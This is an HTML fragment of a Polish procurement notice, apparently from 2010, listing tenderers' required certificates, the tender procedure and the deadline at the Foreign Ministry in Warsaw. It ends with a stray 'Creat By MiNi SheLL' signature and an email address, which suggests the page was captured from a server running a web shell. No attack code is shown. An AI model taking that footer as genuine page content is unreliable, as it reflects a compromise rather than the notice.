<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.msz.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Obsługi MSZ
     00-580 Warszawa
    Al. Szucha 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2010 godzina 11:00, miejsce: Dziennik Podawczy MSZ
  00-580 Warszawa
    Al. Szucha 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com